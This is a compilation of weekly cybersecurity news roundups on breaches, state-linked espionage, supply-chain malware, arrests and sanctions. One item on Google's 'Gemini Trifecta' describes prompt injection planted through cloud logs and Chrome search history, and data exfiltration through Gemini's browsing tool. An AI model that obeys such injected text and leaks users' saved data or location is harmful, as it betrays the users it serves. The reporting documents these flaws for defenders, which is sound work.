Researchers explain how Crimson Collective’s operations begin with harvesting exposed long-term access credentials using open-source tools like TruffleHog. Once inside, they create new privileged accounts and escalate privileges by assigning administrative policies, effectively gaining complete control over the compromised environment. Here, the attackers enumerate users, databases, and storage systems in preparation of large-scale data theft.

The group’s exfiltration process involves modifying database master passwords, creating snapshots of databases before exporting them to S3 for transfer through API calls. EBS (Elastic Block Store) volumes are then launched and attached under permissive security groups to move data more freely. Victims typically receive ransom demands via in-platform email systems and external addresses once exfiltration is complete.

Investigations found that the group employs many IP addresses, some reused across different incidents, which allowed partial tracking of its operations. While Crimson Collective’s size and infrastructure remain unclear, its extortion tactics indicate an expanding threat to organizations relying on cloud-based infrastructure. Using short-term, least-privileged credentials and enforcing IAM policies can help mitigate the chance of breaches.

Researchers warn that leaked credentials and lax privilege management continue to be major enablers for these attacks, and urge companies to tighten access controls, limit credential lifespan, and regularly audit for exposed secrets using open-source scanning tools.

The Ugly | Attackers Breach Discord Ticketing Support, Exposing Data of 5.5M Users

Threat actors claiming to have breached Discord’s customer support systems are now threatening to leak data allegedly stolen from millions of users after the company refused to pay ransom demands. This latest threat follows reports that the attackers first gained access to a third-party support provider in late September, exfiltrating sensitive user information such as names, emails, government IDs, and partial payment details.

Discord confirmed that the compromise affected a vendor system used for customer service, not its internal infrastructure, and said around 70,000 users had their government ID photos exposed – far fewer than the 2.1 million claimed by the attackers. The company stressed that inflated figures and ransom demands were part of an extortion campaign and that it will not reward illegal actions.

According to the threat actors, they accessed Discord’s support platform for 58 hours through a compromised account belonging to an outsourced support agent. During this window, the scope of their claim includes 1.6 terabytes of data, including 8.4 million support tickets affecting 5.5 million users, with roughly 580,000 containing partial payment information. The attackers also said integrations between the support system and Discord’s internal database allowed them to run millions of API queries for additional user data.

The actors initially demanded $5 million, later reducing it to $3.5 million before Discord ended negotiations and went public with the breach. The group has since threatened to release the stolen data, marking one of the largest extortion-driven data thefts to hit a major communication platform in 2025.

The Good | UK Convicts “Bitcoin Queen” in World’s Largest Cryptocurrency Seizure

This week, a court in the UK convicted Bitcoin fraudster Qian Zhimin (aka Zhang Yadi) of acquiring and possessing criminal property after a 7 year pursuit and the recovery of stolen crypto assets now worth $7.3 billion.

Qian, a 47 year old Chinese national, had profited from a multibillion dollar fraud scheme between 2014 and 2017, in which she convinced around 130,000 unwitting victims to invest in “digital gold” by promising returns of 100-300%.

Dubbed “the Bitcoin Queen”, Qian fled from China to the UK using a false passport after authorities began investigating her in 2017. She then attempted to launder her funds through an accomplice, Wen Jian, a 42 year old female who facilitated the purchase of property, jewellery and other high value assets on Qian’s behalf.

In 2018, authorities seized a number of digital devices from Qian and Wen’s London home, but it was not until 2021 that they realized the devices contained digital wallets holding 61,000 Bitcoin, worth at that time around a billion dollars. Wen was subsequently arrested in 2022 and convicted in 2024. Qian remained at large until her arrest in April 2024. Qian’s sentencing has been set for next month.

What happens to the seized funds remains the subject of some controversy since the value of the Bitcoin now far exceeds that of the funds invested by victims. Both the UK government and representatives of the Chinese victims are seeking restitution.

The Bad | Hackers Exploit Milesight Routers to Send Phishing SMS to Users

New research suggests that multiple threat actors may be leveraging an unpatched bug in Milesight cellular routers, targeting users in a number of different countries with SMS phishing messages (aka Smishing) since at least 2022. A patch for the flaw, CVE-2023-43261, was released in 2023, but analysis suggests many unpatched devices remain accessible from the public internet.

The researchers say that attackers have been exploiting the vulnerable routers to send large volumes of SMS messages mimicking government services, banks and delivery companies. Victims receive legitimate looking texts urging them to click malicious links, which redirect to mobile-optimized phishing pages.

The attack is made possible as the flaw allows anyone to access log messages on the exposed routers via API calls. The logs contain encrypted administrator credentials which attackers can decrypt using hardcoded AES keys found in the client-side JavaScript and then use these credentials to authenticate further API calls.

The researchers also believe other bugs may be in play as they noted evidence that many exposed devices were running outdated firmware with other known vulnerabilities.

Analysis of the targeted phone numbers indicates that Europe is the primary region affected by the smishing campaigns, with Belgium heavily targeted; however, vulnerable devices were also observed in Australia, Turkey, Singapore and even North America. In one of a number of campaigns, SMS lures using the domain disney[.]plus-billing[.]sbs and referencing a payment issue urged recipients to click a malicious link.

Phishing messages in several languages, including French, Italian and English, were observed. The researchers believe multiple campaigns have been in operation by different threat actor groups targeting the same vulnerable infrastructure.

Vulnerable cellular routers offer an attractive target to threat actors, affording them the ability to send messages at scale without being flagged as malicious. Individuals and businesses are reminded that, as with other forms of phishing, heightened awareness and scepticism towards unsolicited SMS messages, even when they appear to come from trusted sources, is a vital first line of defense.

The Ugly | Trio of Flaws in Google Gemini Turn AI Into Attack Vehicle

AI is in the spotlight again this week with news that several products within Google’s family of AI models were vulnerable to search injection attacks, prompt injection attacks and exfiltration of user data, leading researchers to dub the flaws the ‘Gemini Trifecta’.

The flaws were found in Google Cloud Platform’s Gemini Cloud Assist, Gemini Search Personalization, and Gemini Browsing Tool, and serve as a reminder of the risks that AI brings to enteprises as threat actors look to manipulate such tools in their attacks. The researchers say they discovered three distinct components in the Gemini suite that had issues:

• Gemini Cloud Assist — This prompt-injection vulnerability in Google Cloud’s Gemini Cloud Assist tool could have enabled attackers to exploit cloud-based services, potentially compromising cloud resources, and also could have allowed phishing attempts. This vulnerability represents a new attack class in the cloud and in general, where log injections can poison AI inputs with arbitrary prompt injections
• Gemini Search Personalization Model — This search-injection vulnerability gave attackers the ability to inject prompts, control Gemini’s behavior and potentially leak the user’s saved information and location data by manipulating their Chrome search history
• Gemini Browsing Tool — This flaw allowed attackers to exfiltrate a user’s saved information and location data by abusing the browsing tool, potentially putting user privacy at risk.

The vulnerabilities were reported to Google and have now been patched. However, it is important that enterprises view AI assistants not just as passive productivity tools but as active attack surfaces and treat them accordingly.

The Good | Law Enforcement Makes Swift Arrest After Attack on Airports

Authorities in the UK have been quick to arrest an individual in connection with the cyber attack on Collins Aerospace last Friday, which caused disruption at several European airports including Berlin, Brussels, Dublin, and Heathrow.

The attack on Collins’ MUSE (Multi User System Environment) software – responsible for processing activities like passenger check-in, boarding and bag drops – disrupted flight across the weekend, with carriers at Brussels airport being told to cancel some 140 of 276 scheduled flights for the following Monday.

Meanwhile, Heathrow is said to have had more than a thousand computers “corrupted”, indicating a likely ransomware attack.

In Berlin, airport authorities said that as of Wednesday morning check-in and boarding were still being handled manually and that passengers should expect delays and cancellations.

A spokesperson for Dublin airport said manual workarounds for check-in and bag drops were still in place as of Wednesday and there was as yet no timeline for when things would return to normal.

An unidentified male in his 40s was arrested in West Sussex, UK on Tuesday evening on suspicion of Computer Misuse Act offences. The UK’s National Crime Agency (NCA) says the investigation remains at an early stage and is ongoing. The man has been released on bail pending further enquiries.

The Bad | DPRK Threat Actor Groups Collaborate to Weaponize Developer Identities

Researchers at ESET have this week offered further evidence that distinct DPRK threat actor groups responsible for the Contagious Interview campaign and the DPRK Fraudulent IT Worker campaign are likely working in concert, using identities stolen from the former to feed the recruitment drive of the latter.

Detailing the activities of a threat actor they call DeceptiveDevelopment, broadly overlapping those of Contagious Interview, the researchers say they uncovered new links between the two campaigns. DeceptiveDevelopment operators use LinkedIn and other social media platforms to pose as recruiters, using fraudulent job offers to lure job seekers and compromise their computers.

Meanwhile, operators running IT worker scams use the information stolen by DeceptiveDevelopment operators to pose as job seekers with companies they wish to infiltrate. The researchers say the fake IT workers initially targeted jobs in the U.S. but have now shifted to European countries such as France, Poland, and Ukraine.

While DeceptiveDevelopment focuses on malware, OSINT shows ties to North Korean IT workers who use fake identities to secure remote jobs, thus surreptitiously funding North Korean state operations. 5/6

— ESET Research (@esetresearch.bsky.social) 25 September 2025 at 10:24

Through an analysis of OSINT data and other research, ESET says the fake IT workers are organized into teams with members working between 10-16 hours per day, pursuing job opportunities, completing tasks and undertaking studies in topics such as web programming, blockchain, AI and English language. The members also use prepared scripts to try and recruit proxies in target countries who would be willing to attend interviews or run laptop farms.

The scale of the DPRK’s activities to infect job seekers and their potential or current employers as well as to use stolen data to infiltrate companies as fraudulent workers has surprised security researchers. The threat presents a different challenge to simply detecting and preventing isolated campaigns and underscores the need for security teams and recruitment teams to develop workflows that can identify fraudulent applications. At the same time, enterprises are urged to ensure they lockdown their internal resources with a trusted security platform that can prevent both intrusions and insider threats.

The Ugly | China-Linked Threat Actor Drops Malware on Edge Devices That Sleeps for Over a Year

China-linked threat actors have been targeting U.S. firms in the tech and legal sectors with a stealthy backdoor known as BRICKSTORM, likely with the aim of infecting a broader range of downstream victims and feeding development of new zero days, Google’s Threat Intelligence Group (GTIG) has said this week.

Attributing the activity to UNC5221, GTIG said the threat cluster was distinct from the widely-reported activities of Silk Typhoon, named as responsible for a number of attacks on U.S. interests earlier this year. UNC5221’s activities are specifically focused on obtaining and maintaining long-term access via backdoors on appliances and network edge devices that typically cannot support endpoint security software due to limited processor power, memory and storage space.

The researchers said initial access was difficult to determine due to the lengthy dwell time between infection and attack, on average 393 days, which often exceeded log retention periods. However, in one case, it was determined that the intrusion leveraged a security flaw in Ivanti Connect Secure devices to obtain initial access.

Having gained a foothold, UNC5221 deploy a Linux/BSD malware known as BRICKSTORM, a Go-based backdoor, to a network appliance before pivoting to VMware vCenter and ESXi hosts, using valid credentials captured from the network appliance.

GTIG said a common theme across incidents was the threat actor’s interest in emails of key individuals within the victim organization, in particular those of developers and system administrators. The attackers used Microsoft’s Entra ID Enterprise Applications with mail.read and full_access_as_app scopes to gain access to every mailbox.

Hunting for BRICKSTORM creates challenges for defenders as the malware typically resides on devices that lack EDR telemetry. Google has released a scanner tool to help search for known samples, along with comprehensive advice for threat hunting and hardening of devices.

The Good | Federal Courts Crack Down on BreachForums & UNC3944 Cybercrime Operators

Conor Brian Fitzpatrick, the 22-year-old operator of the notorious BreachForums hacking site, has been resentenced to three years in prison after a federal appeals court overturned his earlier punishment of time served and supervised release. Known online as “Pompompurin”, Fitzpatrick launched BreachForums in 2022 after the FBI dismantled RaidForums, quickly attracting more than 330,000 members.

The site was a major hub for trading data stolen from telecom providers, healthcare companies, social networks, investment firms, and U.S. government agencies. Fitzpatrick was first arrested in March 2023 and pleaded guilty to being the site’s administrator. Prosecutors sought more than 15 years due to his violations of pretrial conditions, which included secretly using VPNs and unmonitored devices, but the court ultimately imposed a three-year prison term.

Meanwhile, U.K. authorities have advanced their fight against hacking collectives. Two teenagers, 18-year-old Owen Flowers of Walsall and 19-year-old Thalha Jubair of East London, were arrested in connection with the August 2024 cyberattack on Transport for London (TfL). Both are believed to be members of the UNC3944 collective, known most recently for targeting large organizations across multiple verticals.

Flowers faces additional charges for conspiring to breach U.S. healthcare providers, while Jubair has been charged in the U.S. with computer fraud, wire fraud, and money laundering tied to more than 120 global breaches that netted $115 million in ransom. The TfL attack disrupted internal operations, delayed refunds, and exposed customer data including names, addresses, and contact details. Previous arrests in July linked UNC3944 to cyberattacks on major UK retailers such as Harrods and Marks & Spencer.

The Bad | China-Linked TA415 Uses U.S.-China Trade Lures in Targeted Espionage Campaigns

A Chinese state-sponsored threat actor known as TA415 has been linked to a string of spearphishing attacks against U.S. government entities, think tanks, and academic institutions in July and August. The campaign tailored its lures by using U.S.-China economic and trade topics, even impersonating the U.S.-China Business Council and the Chair of the House Select Committee on Strategic Competition to target individuals focused on relations and policy between the two nations.

Emails appeared to invite recipients to closed-door briefings and were sent from uschina@zohomail[.]com, with links to archives hosted on Zoho WorkDrive, Dropbox, and OpenDrive. These archives contained a decoy PDF and a Windows shortcut (LNK) file, which executed a batch script that deployed WhirlCoil, an obfuscated Python loader. The malware was able to establish persistence via scheduled tasks and open Visual Studio Code Remote Tunnels to grant attackers backdoor access and enable arbitrary command execution.

The collected data, including system information and user files, was exfiltrated through request logging services in base64-encoded HTTP POST requests. While early variants downloaded WhirlCoil components from Pastebin and Python.org, the infection chain has remained largely consistent since its first noted use in 2024 against aerospace, insurance, and manufacturing firms.

The continued abuse of Visual Studio Code Remote Tunnels highlights the challenge for defenders: since the feature is legitimate, it blends into normal developer workflows, and is hard to detect without specific monitoring. Analysts note that TA415, which overlaps with APT41, has gradually refined this technique over the past year, ramping up activity in recent months as U.S.-China trade negotiations intensify.

The Ugly | Chaos Mesh Vulnerabilities Put Kubernetes at Risk of Full Cluster Takeovers

Researchers have revealed multiple critical flaws in Chaos Mesh, an open-source Chaos Engineering platform for Kubernetes designed to simulate, test, and identify potential weak spots in pods, networks, and other components. If exploited, the four vulnerabilities, collectively named Chaotic Deputy, could allow attackers to take over entire clusters.

The report warned that attackers need only minimal in-cluster network access to exploit the vulnerabilities, enabling them to run fault injections, shut down pods, disrupt communications, and even steal privileged tokens for further attacks.

CVE-2025-59358 (CVSS 7.5) exposes an unauthenticated GraphQL debugging server that lets attackers kill arbitrary processes in any Kubernetes pod, which could lead to cluster-wide denial-of-service. CVE-2025-59359, CVE-2025-59360, CVE-2025-59361 (all, categorized as CVSS 9.8) are command injection flaws in the Chaos Controller Manager’s GraphQL mutations (cleanTcs, killProcesses, and cleanIptables, respectively) that allow remote code execution (RCE).

Chaotic Deputy stems from insufficient authentication in the Chaos Controller Manager’s GraphQL server. An in-cluster attacker with initial access to a network could chain the four vulnerabilities to execute arbitrary commands on the Chaos Daemon, achieving full cluster compromise. The result could mean data theft, service disruption, and lateral movement across Kubernetes environments.

The flaws were responsibly disclosed in early May and patched in Chaos Mesh version 2.7.3, released August 21. Users are strongly urged to upgrade immediately, and if patching isn’t possible, mitigations include restricting network traffic to the Chaos Mesh daemon and API server as well as avoiding deployments in open or weakly secured environments.

Researchers stressed that while Chaos Engineering platforms offer the ability to test resilience, their deep cluster access and flexibility makes them a high-value target and vulnerabilities like Chaotic Deputy can be especially risky if left unpatched.

The Good | U.S. Charges Ransomware Operator, Sanctions $10B Scam Networks & Secures BlackDB Guilty Plea

Kosovo national Liridon Masurica (33), has pleaded guilty to operating BlackDB[.]cc, a cybercrime marketplace active online from 2018 to 2025. Arrested in December 2024 and extradited to the U.S. this May, Masurica has admitted to selling stolen credit cards, compromised accounts, server credentials, and personally identifiable information (PII), primarily from U.S. victims. Cybercriminals would purchase and use the data for identity theft, tax fraud, and financial crimes. Charged with six counts of fraud, Masurica faces up to 55 years in prison.

While Masurica’s conviction highlights the dangers of underground markets, U.S. authorities are also focusing on larger-scale fraud networks. The Department of the Treasury has sanctioned major cyber scam networks in Myanmar (formerly Burma) and Cambodia that stole over $10 billion from Americans in 2024, a 66% increase from 2023. These operations, often run with forced labor and human trafficking, engage in romance scams and fake crypto schemes. OFAC named 19 individuals and entities tied to the Karen National Army (KNA) and Cambodian crime groups. The sanctions freeze U.S. assets, cut access to international finance, and disrupt operations despite no arrests.

Building on these actions, the U.S. Department of Justice has charged Ukrainian national Volodymyr Tymoshchuk (aka deadforz, Boba, msfv, and farnetwork) for administering the LockerGoga, MegaCortex, and Nefilim ransomware operations. From 2019 to 2021, he and accomplices breached over 250 companies worldwide, stealing millions and disrupting critical services. Tymoshchuk allegedly managed Nefilim, granting affiliates access for a share of ransom payments. Already on FBI and EU most wanted lists, he faces multiple fraud and computer crime charges. The U.S. State Department is offering $10 million for information leading to his capture.

The Bad | ‘GhostAction’ Supply Chain Attack Exfiltrates Thousands of Secrets from GitHub

Cyber researchers have uncovered a large-scale software supply chain attack on GitHub dubbed “GhostAction”, which has exposed more than 3,300 secrets, including PyPI, npm, DockerHub, GitHub tokens, Cloudflare API keys, AWS access keys, and database credentials so far.

The campaign came to light after suspicious activity was detected in the FastUUID project on September 2. Attackers had compromised maintainer accounts and injected a malicious GitHub Actions workflow designed to trigger on code pushes or manual dispatch.

Once activated, the workflow harvested secrets from the environment and exfiltrated them via a curl POST request to an attacker-controlled server. In FastUUID’s case, its PyPI token was stolen, though no malicious package uploads were made prior to the breach being contained.

Further investigation revealed that the incident was far more widespread than just FastUUID. At least 817 repositories were found to contain similar malicious commits, all sending stolen secrets to the same endpoint. To maximize the theft, attackers enumerated secret names from legitimate workflows, then hardcoded them into their own scripts.

By September 5, researchers had notified GitHub, npm, and PyPI, while also filing issues across 573 impacted repositories. One hundred projects, at this point, had already detected and reverted the malicious commits. Soon after disclosure, the exfiltration endpoint was taken offline, but not before significant damage occurred.

The exposure affects at least nine npm and 15 PyPI packages, leaving open the possibility of malicious releases unless maintainers revoke compromised tokens. While the campaign shares similarities with the AI-powered ‘s1ngularity’ attack on over 2100 GitHub accounts from August, researchers believe GhostAction is altogether a separate operation.

The Ugly | House Panel Warns of Chinese Cyber Espionage Exploiting Political Communication

Highly targeted cyber espionage campaigns amidst tense trade negotiations between the U.S. and China have led the House Select Committee on China to issue an advisory warning. These campaigns, linked to the PRC, are focused on U.S. government agencies, business groups, law firms, and think tanks while the two economic powers continue talks on tariffs and diplomacy.

According to the committee, suspected threat actors based in China impersonated Republican Party Congressman John Robert Moolenaar (R-MI) in phishing emails sent out to trusted contacts. The emails, framed as requests for input on sanctions against China, carried attachments that deployed malware to steal sensitive data and establish persistence. So far, the actors are believed to be APT41, a prolific state-backed group known for global espionage campaigns.

Moolenaar, who is also the Chairman of the House Select Committee, stressed that these attacks aim to steal U.S. strategy and leverage it against Congress, the Administration, and the American people. Historically, the campaign aligns with tactics often used by state-sponsored threat actors, including abuse of cloud services and legitimate software to obscure activity and exploit personal or unofficial communication channels. The Chinese embassy has rejected the allegations, stating it “firmly opposes and combats all forms of cyber attacks and cyber crime” and opposes accusations without solid evidence.

Adversaries are increasingly exploiting the extension of modern political communication. Not all exchanges occur over official government accounts or devices, and attackers are capitalizing on trusted officials that engage with partners through personal or less-secure channels. By masquerading as familiar public figures and using the right lures, they can amplify authenticity and carry out their objectives while evading detection.

The Good | U.S. Puts $10m bounty on Heads of Three Russian FSB Threat Actors

The U.S. Department of State has announced a bounty of up to $10 million for information on three Russian Federal Security Service (FSB) officers accused of orchestrating cyberattacks against U.S. critical infrastructure. The officers, Marat Valeryevich Tyukov, Mikhail Mikhailovich Gavrilov, and Pavel Aleksandrovich Akulov, are thought to be linked to FSB’s Center 16 (aka Military Unit 71330).

The same trio was also charged in March 2022 for a long-running campaign (2012–2017) that targeted U.S. government agencies, including the Nuclear Regulatory Commission and various energy firms. One such firm, Wolf Creek Nuclear Operating Corporation, operates a nuclear power plant based in Burlington, Kansas. According to the State Department, Tyukov, Gavrilov, and Akulov’s operations extended to over 500 foreign energy companies in 135 other countries.

Just a few weeks ago, the FBI warned that the same actors had been exploiting CVE-2018-0171 in outdated Cisco networking devices over the past year. The vulnerability allows attackers to remotely execute code on unpatched systems, allowing them to breach multiple companies across U.S. critical infrastructure sectors. The networking firm has since released a patch for the flaw and urged network admins to update their devices.

The FSB-linked group has a long history of targeting U.S. state, local, tribal, and aviation entities. Tips can be submitted anonymously via the department’s Tor-based Rewards for Justice channel, with the possibility of relocation for informants.

The Bad | Ethereum Smart Contracts Drive New NPM Malware Delivery Campaign

Two newly uncovered malicious npm packages are using Ethereum smart contracts to conceal and deliver malware, highlighting evolving attacker tactics in software supply chain attacks. The packages, colortoolsv2 and mimelib2, were uploaded in July 2025 and later removed.

According to security researchers, the packages trigger code that fetches a second-stage payload from attacker-controlled servers once they are imported into a project. While the packages can be easily exposed for their malicious functionality, GitHub projects that imported them make them appear credible to unsuspecting users. What sets this operation apart is its use of Ethereum smart contracts to host the URLs for payload delivery, a method reminiscent of the EtherHiding technique. By leveraging decentralized blockchain infrastructure, attackers can better obscure their command and control (C2) mechanisms and avoid takedowns.

Further investigation has linked the npm packages to a wider campaign involving bogus GitHub repositories disguised as cryptocurrency trading tools, including solana-trading-bot-v2, ethereum-mev-bot-v2, and hyperliquid-trading-bot. These repositories all falsely advertised automated trading capabilities, targeting developers and crypto enthusiasts. The accounts tied to this activity were connected to a distribution-as-a-service (DaaS) cluster dubbed ‘Stargazers Ghost Network’, known for manipulating repository popularity through fake stars, forks, and commits.

These incidents point to a broader trend: crypto-related supply chain attacks are accelerating and growing more sophisticated. As threat actors weaponize blockchain technology to distribute malware, developers are being urged to go beyond surface metrics when evaluating libraries and to rigorously vet both open-source and third-party code for signs of tampering. Proactive scrutiny, including reviewing not just downloads and commit history but also the credibility of maintainers, remains the first line of defense against malware hidden in trusted repositories.

The Ugly | DPRK Threat Actors Leverage Cyber Threat Intel Tools to Manage Campaigns

SentinelLABS and Validin have revealed that North Korea-aligned threat actors behind the Contagious Interview campaign cluster actively monitor cyber threat intelligence (CTI) platforms to track exposure of their infrastructure and scout new assets. The actors operate in coordinated teams, communicating via common enterprise tools like Slack, while drawing on sources such as Validin, VirusTotal, and Maltrail to inform their operations.

Although they recognize their infrastructure is detectable, these actors make only limited modifications to conceal it. Instead, they focus on rapidly deploying new assets following service provider takedowns, maintaining high victim engagement over preserving older infrastructure. This approach reflects both resource constraints and internal incentives, as decentralized teams compete to protect individual assets rather than coordinate large-scale security updates.

Between January to March 2025, SentinelLABS identified more than 230 victims, most of them cryptocurrency professionals, though the actual number is likely higher. Targets are lured through fake job offers using the ClickFix social engineering technique, which manipulates candidates into running malicious commands under the guise of assessments or troubleshooting errors.

Accompanying reporting by Reuters highlights how these scams have become common in the crypto industry. Interviews with victims, including developers, consultants, and executives, confirmed the sophistication of the fraudulent offers as well as financial losses suffered. The reporting humanizes the impact and the breadth of the campaign, showing how Pyongyang-backed actors exploit trust and professional networks to steal digital assets.

Effective mitigation requires vigilance from job seekers, especially those in the cryptocurrency sector, alongside proactive disruption of malicious infrastructure by service providers. Close collaboration, intelligence-sharing, and media exposure are also essential in reducing the reach and impact of these campaigns.

The Good | Interpol Cracks Down on Cybercrime as U.S. Sanctions North Korean IT Scheme

Interpol announced the arrest of over 1200 suspects in Operation Serengeti 2.0, a three-month crackdown on cybercrime across Africa. Conducted between June and August, the operation dismantled 11,432 malicious infrastructures, seized $97.4 million, and disrupted attacks impacting nearly 88,000 victims worldwide. Investigators from 18 African nations and the U.K. collaborated under the African Joint Operation against Cybercrime, supported by various private sector partners. Targets included ransomware operators, online scammers, and business email compromise (BEC) groups.

This is the latest in a series of coordinated operations across Africa, following earlier successes such as Operation Red Card and Operation Serengeti (2024). Interpol emphasized that each initiative strengthens cross-border cooperation, expanding both intelligence sharing and investigative expertise, which garner larger, more impactful results in the fight against transnational cybercrime.

The U.S. Treasury’s OFAC has sanctioned two individuals and two entities tied to North Korea’s illicit remote IT worker scheme, which funds its weapons and missile programs. Russian national Vitaliy Sergeyevich Andreyev, North Korean official Kim Ung Sun, Shenyang Geumpungri Network Technology (China), and Korea Sinjin Trading Corporation were named for defrauding American businesses. Andreyev allegedly helped transfer nearly $600,000 in cryptocurrency-to-cash payments, while Shenyang Geumpungri generated over $1 million in profits since 2021.

The IT worker scheme, specifically, embeds North Korean IT workers in global companies using fake identities and stolen documents. Recent investigations indicate a growing reliance on AI tools to build false resumes, pass interviews, and deliver work. Authorities warn the operation also enables malware insertion, data theft, and extortion against targeted firms.

The Bad | UpCrypter Malware Loader Spreads Through Fake Voicemails to Install RAT Payloads

A new phishing campaign distributing a malware loader known as UpCrypter is using fake voicemail notifications and purchase orders as lures. Active since early August 2025, the campaign has primarily targeted organizations in manufacturing, technology, healthcare, construction, and retail/hospitality, with infections observed in Austria, Belarus, Canada, Egypt, India, Pakistan, and several others worldwide.

The attack begins with carefully crafted phishing emails containing malicious URLs to fraudulent landing pages that mimic corporate branding by embedding a victim’s domain name and logo. Victims are prompted to download what appears to be a voicemail or PDF, delivered as a ZIP archive containing an obfuscated JavaScript file. Once executed, the script checks for internet connectivity, scans for forensic tools or sandbox environments, and then retrieves the next-stage malware from an external server.

UpCrypter serves as a dropper for multiple remote access tools (RATs), including PureHVNC RAT, DCRat, and Babylon RAT, all of which enable full control of infected systems and provide attackers with remote surveillance, credential theft, and command execution capabilities. Payloads may be delivered in plain text or concealed via steganography inside images. A parallel distribution method uses a Microsoft Intermediate Language (MSIL)-based loader that performs similar anti-analysis checks before fetching an obfuscated PowerShell script, a DLL, and the main payload.

The final execution sequence embeds data from the DLL and payload directly into memory, bypassing the file system to minimize forensic artifacts. Security researchers warn that UpCrypter’s evolving design, combining layered obfuscation, sandbox evasion, and flexible RAT deployment, points to an actively maintained delivery ecosystem capable of persisting across environments that rely only on traditional defenses.

The Ugly | Salt Typhoon Expands Global Cyber-Espionage Campaign via Router Exploits

Authorities from 13 nations, including the U.S., U.K., Canada, Germany, and Japan, have issued a joint security advisory linking three Chinese tech companies to advanced persistent threat (APT) group Salt Typhoon (also tracked as UNC2286). Receiving intelligence services, cyber tools, and stolen data, the China-based actor has been able to intensify its global cyberespionage operations. Targeting has been focused on telecommunications, government, transportation, and military infrastructure since at least 2019.

The group focuses on exploiting backbone, provider edge (PE), and customer edge (CE) routers, using flaws such as CVE-2018-0171, CVE-2023-20198, CVE-2023-20273, CVE-2023-46805, CVE-2024-21887, and CVE-2024-3400. Compromised devices are modified for persistence through generic routing encapsulation (GRE) tunnels, altered Access Control Lists (ACLs), custom containers, and added IP-controlled ports. Attackers further exploit Terminal Access Controller Access Control System Plus (TACACS+) authentication traffic on TCP/49 to harvest highly privileged administrator credentials, enabling lateral movement across network environments.

To date, Salt Typhoon has attacked over 600 organizations across 80 countries. The advisory emphasized that intrusions into telecom and transportation networks have enabled Chinese intelligence services to track communications and movements worldwide. Experts urge defenders to watch for configuration changes, container activity, unusual tunnels, and integrity issues in firmware and logs.

To counter Salt Typhoon and similar threats, the guidance calls for rapid patching, adoption of zero-trust models, disabling unused services, and strengthening authentication. Officials warn that adversaries will only grow more sophisticated, stressing the need to retire outdated systems and harden defenses.

The Good | Courts Crack Down on Cybercriminals & Python Package Index Boosts Security

Noah Michael Urban, a key UNC3944 member, has been sentenced to 10 years in prison after pleading guilty to wire fraud and conspiracy. Arrested in January 2024, he and four others were charged with stealing millions from cryptocurrency wallets using SMS phishing, SIM swaps, and stolen employee credentials. Urban admitted making “several million dollars”, though much was lost gambling. He must pay $13 million restitution. UNC3944 is notorious for its high-profile breaches. Most recently, the collective had set their sights on major entities within the retail, insurance, and transportation verticals.

In a separate case, Al-Tahery Al-Mashriky of Rotherham, UK, has been sentenced to 20 months in prison after pleading guilty to nine cybercrime charges and admitting to the theft of millions of Facebook credentials and hacking websites across Yemen, Israel, Canada, and the U.S. Linked to extremist groups like Spider Team and Yemen Cyber Army, Al-Mashriky infiltrated government systems, defaced sites, and held stolen login data from services including PayPal and Netflix. Authorities said that many of his attacks sought to target websites posting religious content or political viewpoints.

While law enforcement pursues offenders, defenders are also strengthening ecosystems. Python Package Index (PyPI) package manager now checks for expired domains to block supply chain attacks via domain resurrection. This update targets scenarios where attackers exploit expired domains to hijack accounts through password resets, a tactic first exploited in 2022 with the ctx PyPi package. Since early June, PyPI has unverified over 1800 email addresses tied to expiring domains. Now, domains are reviewed every 30 days using Fastly’s Status API. PyPI also urges users to enable 2FA and maintain backup emails from trusted providers to boost cyber hygiene.

The Bad | Noodlophile InfoStealer Attackers Evolve Malware With Telegram Staging

A series of attacks leveraging spearphishing and Noodlophile malware continues to target enterprises in the U.S., Europe, the Baltics, and the Asia-Pacific regions. A new report details how the threat actors behind the campaign are using upgraded delivery mechanisms in order to deploy an enhanced version of Noodlophile Stealer.

In particular, the campaign relies on spearphishing emails with copyright infringement lures, including details such as Facebook Page IDs and company ownership records gleaned during reconnaissance. The tailored messages provide Dropbox links that deliver ZIP or MSI installers designed to sideload a malicious DLL via legitimate Haihaisoft PDF Reader binaries. This launches the obfuscated Noodlophile infostealer after batch scripts establish persistence through the Windows Registry.

Noodlophile first gained attention in May 2025 for disguising itself as fake AI-powered tools promoted on Facebook. While similar copyright-themed lures are not a new technique, the latest variant introduces distinct abuse of software vulnerabilities, Telegram-based staging, and dynamic payload execution. As a key element in the attack, Telegram group descriptions are used as a dead drop resolver to fetch the actual payload server (paste[.]rs), complicating detection and takedown efforts.

The stealer is capable of harvesting browser data and system information with its evolving codebase and hints at future enhancements such as screenshot capture, keylogging, process monitoring, file encryption, and network data theft. Security researchers highlight that the campaign focuses on enterprises with large social media presences, particularly those with a significant number of Facebook followers.

By layering obfuscation, LOLBin abuse, and in-memory execution, Noodlophile’s ongoing development and adaptation signals that its operators are refining the malware into a more versatile and dangerous enterprise threat.

The Ugly | DPRK-Based Actors Deploy MoonPeak RAT via GitHub to Spy on South Korea

A new cyberespionage campaign targeting South Korean diplomatic missions has been attributed to North Korean threat actors, with activity spanning from March to July 2025. At least 19 spearphishing emails have impersonated trusted diplomats and officials, luring foreign ministry staff and embassy personnel with fake meeting invites, letters, and event announcements.

Security researchers found the attackers using GitHub as a covert command and control (C2) channel, while also abusing Dropbox, Google Drive, and Daum Cloud to distribute a customized version of the open-source Xeno RAT, dubbed MoonPeak. Malicious ZIP files delivered through phishing contained disguised Windows shortcut (LNK) files that launch PowerShell scripts before ultimately fetching payloads from GitHub and establishing persistence via scheduled tasks. Decoy documents are then shown to victims while the malware harvests system data and exfiltrates it to private GitHub repositories.

The campaign is linked to Kimsuky, a DPRK-aligned threat group known for espionage against South Korean targets. The lures, written in multiple languages including Korean, English, Arabic, and French, were all carefully timed with real diplomatic events to boost their credibility.

However, forensic analysis has raised attribution questions: attacker activity appeared to align more closely with Chinese time zones, including a notable three-day pause coinciding with China’s national holidays in April 2025. This suggests multiple possibilities. Either North Korean operatives are working from Chinese territory, Chinese actors are mimicking Kimsuky tradecraft, or there is a joint collaboration blending Chinese resources and North Korea’s ability to gather intelligence.

Currently, researchers assess with medium confidence that the attackers operate from within China, potentially leveraging Korean infrastructure to blend into local network traffic while conducting intelligence-gathering operations on behalf of Pyongyang.

The Good | DoJ Charges $100M Fraud Ring & Seizes $1M in Crypto from BlackSuit Ransomware

